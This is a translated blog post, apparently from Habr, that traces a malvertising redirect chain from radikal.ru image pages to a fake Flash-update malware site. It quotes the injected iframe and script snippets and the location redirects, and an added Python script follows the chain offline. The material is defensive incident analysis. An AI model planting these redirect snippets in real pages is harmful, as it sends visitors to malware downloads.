
Viruses from Radikal. Again!

The story began with a text message, “get on Skype, urgently”, from a client, the owner of a site I help keep running. It turned out he had received a letter from a certain Alexander Goryachev stating that the site was most likely infected.

Here is the text of the letter:

Hello.

My name is Alexander Goryachev, I am an analyst at Doctor Web.
There is information that when images are opened in this thread, yarportal.ru/topic324608s0.html on the forum yarportal.ru, a redirect occurs from the image hosting radikal.ru to a fraudulent website that distributes mobile malware under the guise of software updates. That is, if you are using a mobile device (phone, smartphone), the radikal.ru page with the correct image opens first, but then almost immediately there is a redirect to a fraudulent site (for example, newbrwzer.com/?a=u264w264z413x4u2w4x2t2v2y3u2x494q233c4y2b4w26413). If the images are opened directly on the hosting itself, without the intermediate link via yarportal.ru, this behavior is not observed. Perhaps yarportal.ru was hacked, or it uses an unscrupulous advertising model that the portal owners may not be aware of.

Of the contact details, yours seemed the most appropriate, so it was decided to report this to you. Could you somehow comment on the situation and look into this issue? We would be grateful for any information you can provide.

Thanks.


The site is a fairly large forum, so users post pictures wherever they like and then paste the links in the form the image hosting hands out. Radikal, alas, is one of the most popular of these hostings.

I tried to reproduce the analyst's steps and capture the traffic going to the mobile device. A redirect to this newbrwzer does indeed occur, but it is not at all clear what our site has to do with it. Analysis of the traffic showed that the malicious link is served by Radikal itself, roughly like this:

 $ curl -s http://radikal.ru/F/s45.radikal.ru/i107/1205/76/593cc990c6ae.jpg.html | grep adv-port
 <script>document.write('<iframe border="0" marginwidth="0" marginheight="0" src="http://adv-port.com/view2.php?title='+document.title+'&referrer='+document.referrer+'&lang='+navigator.language+'"frameborder="0" height="120" scrolling="no" width="240"></iframe>');</script>


This sends the browser on to a page of the form:
 http://adv-port.com/view2.php?title=%D0%A0%D0%B0%D0%B4%D0%B8%D0%BA%D0%B0%D0%BB-%D0%A4%D0%BE%D1%82%D0%BE%20::%20%D0%A3%D0%B2%D0%B5%D0%BB%D0%B8%D1%87%D0%B5%D0%BD%D0%BD%D0%BE%D0%B5%20%D0%B8%D0%B7%D0%BE%D0%B1%D1%80%D0%B0%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5&referrer=http://yarportal.ru/topic324608s0.html&lang=en 


which contains the following code:
 <script src="http://adv-port.com/ctr.php?ref='+document.referrer+'"></script> 


The link adv-port.com/ctr.php?ref='+document.referrer+' contains the following code:
 function error() { top.location='http://network-sitead.com/'; } 


That link, in turn, contains the following code:
 <script src='http://on-line-adv.com/2.php'></script> 


Downloading that produces the following:
 document.location='http://newbrwzer.com/?a=u264w264z413x4u2w4x2t2v2y3u2x494q233c4y2b4w26413' 
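As an added example (not code from the original post or from Radikal, adv-port or Dr.Web), the chain quoted above can be reconstructed mechanically rather than by eye. The script below is mine: in place of live fetches it embeds constructed page bodies that mirror the snippets quoted in the post, pulls the onward URL out of each body (an iframe or script `src`, or a `top.location`/`document.location` assignment, the three hand-off patterns that appear in the post), and lists every host the visitor passes through that is not the image host, which is the check a site owner who receives such a letter would want to run against a capture. `fetch_offline`, `follow_chain` and `hosts_off_site` are my names; the page bodies are constructed and labelled as such.

```python
import re
from urllib.parse import urlparse

# Constructed stand-in for the pages the post fetched with curl. The bodies
# mirror the quoted snippets; nothing here touches the network.
START = "http://radikal.ru/F/s45.radikal.ru/i107/1205/76/593cc990c6ae.jpg.html"

PAGES = {
    START: (
        "<html><head><title>Radikal-Foto</title></head><body>"
        "<script>document.write('<iframe border=\"0\" marginwidth=\"0\" "
        "src=\"http://adv-port.com/view2.php?title='+document.title+'&referrer='"
        "+document.referrer+'&lang='+navigator.language+'\" frameborder=\"0\">"
        "</iframe>');</script></body></html>"
    ),
    "http://adv-port.com/view2.php": (
        "<html><body><script src=\"http://adv-port.com/ctr.php?ref='+document.referrer+'\">"
        "</script></body></html>"
    ),
    "http://adv-port.com/ctr.php":
        "function error() { top.location='http://network-sitead.com/'; }",
    "http://network-sitead.com/":
        "<html><body><script src='http://on-line-adv.com/2.php'></script></body></html>",
    "http://on-line-adv.com/2.php":
        "document.location='http://newbrwzer.com/?a=u264w264z413x4u2w4x2t2v2y3u2x494q233c4y2b4w26413'",
}

# The ways the chain in the post hands the browser onward: an iframe or
# script tag with an off-site src, or a JavaScript location assignment.
NEXT_HOP = re.compile(
    r"""<(?:iframe|script)\b[^>]*?\bsrc=["']([^"']+)"""                          # group 1: tag src
    r"""|(?:top|document|window)\.location(?:\.href)?\s*=\s*["']([^"']+)""",   # group 2: JS redirect
    re.IGNORECASE,
)


def normalize(url: str) -> str:
    """Drop query and fragment so a URL whose parameters are still JS
    concatenation fragments resolves to its page in the offline table."""
    return urlparse(url)._replace(query="", fragment="").geturl()


def fetch_offline(url: str):
    """Return the constructed body for a URL, or None once the hop leaves the table."""
    return PAGES.get(normalize(url))


def next_hop(body: str):
    """Extract the first onward URL from a page body, or None if there is none."""
    m = NEXT_HOP.search(body)
    if not m:
        return None
    return m.group(1) or m.group(2)


def follow_chain(start: str, fetch, max_hops: int = 10) -> list:
    """Walk the redirect chain from `start`, returning every URL visited; the
    last entry is the first URL that cannot be fetched or hands off nowhere."""
    chain = [start]
    seen = {normalize(start)}
    url = start
    for _ in range(max_hops):
        body = fetch(url)
        if body is None:
            break                     # outside what we captured: final destination
        nxt = next_hop(body)
        if nxt is None or normalize(nxt) in seen:
            break                     # dead end or loop
        chain.append(nxt)
        seen.add(normalize(nxt))
        url = nxt
    return chain


def hosts_off_site(chain: list) -> list:
    """Distinct hosts in the chain other than the one the visitor started on, in order."""
    origin = urlparse(chain[0]).hostname
    out = []
    for url in chain[1:]:
        host = urlparse(url).hostname
        if host != origin and host not in out:
            out.append(host)
    return out


if __name__ == "__main__":
    chain = follow_chain(START, fetch_offline)
    for i, u in enumerate(chain):
        print(f"{i}: {u}")
    print("off-site hosts:", hosts_off_site(chain))
```

Against the constructed bodies the walk ends on newbrwzer.com after passing adv-port.com, network-sitead.com and on-line-adv.com, none of which the forum or the image host controls. Pointing `follow_chain` at a function that fetches with a mobile User-Agent instead of `fetch_offline` turns it into the check the post describes doing by hand.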


That is, in the end the browser really does land on a page offering to “update” the Flash Player. A little later it turned out that some users really did “update” it: yarportal.ru/topic332505.html

Following this “investigation”, three questions arise:
  1. When will Radikal finally die off with this kind of advertising policy? This is not the first case of viruses spreading through it.
  2. Where does Dr.Web get analysts who don't bother to look at the traffic with wireshark / tcpdump?
  3. Or maybe I'm just a fool and the site really is infected? :)


PS: The analyst really is with Dr.Web; his article is on Habr in the company's corporate blog: habrahabr.ru/company/drweb/blog/142993

UPD: “don't use Radikal” is, of course, a great idea, but unfortunately it is very close to utopian. Much more interesting is why viruses regularly turn up there, and how many more of these “updates” have already been delivered from that site; Radikal's audience is huge)

UPD2: no need to suggest alternatives to Radikal, I already know them, thank you.

Source: https://habr.com/ru/post/144819/
